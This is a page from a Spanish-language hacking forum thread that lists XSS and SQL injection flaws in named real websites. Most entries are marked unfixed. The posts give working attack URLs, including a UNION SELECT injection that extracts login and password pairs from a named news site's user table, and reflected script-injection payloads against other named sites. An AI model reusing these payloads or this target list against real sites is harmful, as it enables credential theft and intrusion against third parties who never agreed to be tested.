elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Recopilatorio de Vulnerabilidades de XSS/SQLinjection		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 [5] 6 Ir Abajo Respuesta Imprimir
Autor Tema: Recopilatorio de Vulnerabilidades de XSS/SQLinjection  (Leído 88,455 veces)
franco_tuv

Desconectado Desconectado

Mensajes: 5



Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #40 en: 23 Julio 2011, 18:27 pm »
Sitio web: http://www.elpais.cr
Descubridor: franco_tuv
Fecha de descubrimiento: 22 de Julio del 2011
Fecha de notificación: 22 de Julio del 2011
Fecha de publicación: 23 de Julio del 2011
Arreglado : No
Información adicional:
Código:
SQLI
http://www.elpais.cr/galerias.php?id=-1+union+select+1,group_concat%28login,0x3a,password%29+from+406060_elpais.usuarios--
En línea
daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #41 en: 13 Mayo 2013, 14:19 pm »
Sitio web: http://rebelion.org
Descubridor: daryo
Fecha de descubrimiento: 12 mayo 2012
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
Citar
XSS
http://rebelion.org/mostrar.php?id=%3Cscript%3Ealert%28/a/%29%3C/script%3E&submit=Buscar&inicio=1&tipo=3

PD:reviviendo el post XD
En línea
buenas
daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #42 en: 13 Mayo 2013, 14:21 pm »
Sitio web: http://www.szkolamarzen.pl
Descubridor: daryo
Fecha de descubrimiento: 20 mayo 2012
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:

Código:
sqli
http://www.szkolamarzen.pl/gim/newsone.php?id=
En línea
buenas
daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #43 en: 13 Mayo 2013, 14:24 pm »
Sitio web: http://www.worstpreviews.com
Descubridor: daryo
Fecha de descubrimiento: la verdad ni recuerdo
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
Código:
sqli
http://www.worstpreviews.com/review.php?id=600
En línea
buenas
daryo


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #44 en: 13 Mayo 2013, 14:31 pm »

Insertar Cita
Sitio web: http://www.eventdirect.ca
Descubridor: seguro alguien antes que yo :P
Fecha de descubrimiento: la verdad ni recuerdo
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
Código:
Código:
sqli
http://www.eventdirect.ca/game.php?ID=62
« Última modificación: 13 Mayo 2013, 14:35 pm por daryo » En línea
buenas
cachacko

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #45 en: 9 Septiembre 2013, 04:53 am »



Nunca he visto esto. Muy interesante.
En línea
Socket

Desconectado Desconectado

Mensajes: 4



Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #46 en: 9 Septiembre 2013, 07:07 am »
bien hay
En línea
Hazama

Desconectado Desconectado

Mensajes: 22


Nobody will remember a scum like you!


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #47 en: 4 Mayo 2014, 23:50 pm »
Sitio web:http://www.espanol.manutd.com/
Descubridor:The BlacK DiamOnD
URL del aviso: --
Fecha de descubrimiento: 2013
Fecha de notificación:24/11/13
Fecha de publicación: --
Arreglado: Si
Vulnerabilidad: XSS
Información adicional:Aunque Esta vulnerabilidad haya sido supuesta mente arreglada,aun sigue existiendo solo que incluyendo código HTML en vez de javascript.

Código
  1. <script>alert("XSS");</script>
&
Código
  1. <h1>xss</h1>
« Última modificación: 5 Mayo 2014, 01:56 am por Tatsurou_LuLu » En línea
Hazama

Desconectado Desconectado

Mensajes: 22


Nobody will remember a scum like you!


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #48 en: 5 Mayo 2014, 01:53 am »
Sitio web:http://blog.com.es/
Descubridor:The Black DiamOnD
URL del aviso:http://bugs.blog.co.uk/2014/05/04/html-xss-bug-18373598/
Fecha de descubrimiento: 04/05/2014
Fecha de notificación:04/05/2014
Fecha de publicación:04/05/2014
Arreglado: --
Vulnerabilidad: XSS reflejado
Informacion adicional:Blog Personal

Código:
http://support.blog.co.uk/search/%253Ch1%253EHOLA%2BMUNDO%253C%252Fh1%253E/AND/
« Última modificación: 5 Mayo 2014, 01:57 am por Tatsurou_LuLu » En línea
Ceh

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #49 en: 12 Junio 2014, 08:30 am »


PETROLERA MAS POPULAR EN PERU

BY Security : Peruano y Muy PICHULON  ;D
En línea
Páginas: 1 2 3 4 [5] 6 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Recopilatorio de C#
.NET (C#, VB.NET, ASP) 		/* strcpy() */ 3 8,415 Último mensaje 5 Junio 2007, 17:50 pm
por piroman
Como hacer update en SQLinjection
Nivel Web 		BlackHKR 6 6,490 Último mensaje 12 Mayo 2010, 20:55 pm
por BHK
Duda SQLinjection en information_schema « 1 2 »
Nivel Web 		miguelskk 10 8,529 Último mensaje 17 Julio 2010, 01:46 am
por TapIt
AYUDA:Captura de paquetes con Wireshark para herramienta SQLinjection
Hacking 		NetStorm 1 3,836 Último mensaje 5 Octubre 2011, 00:06 am
por alpha015
SQLInjection sin acceso a information_schema
Nivel Web 		buggy_man 3 3,285 Último mensaje 11 Agosto 2012, 07:17 am
por afdlkglfgfdgfhgf
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines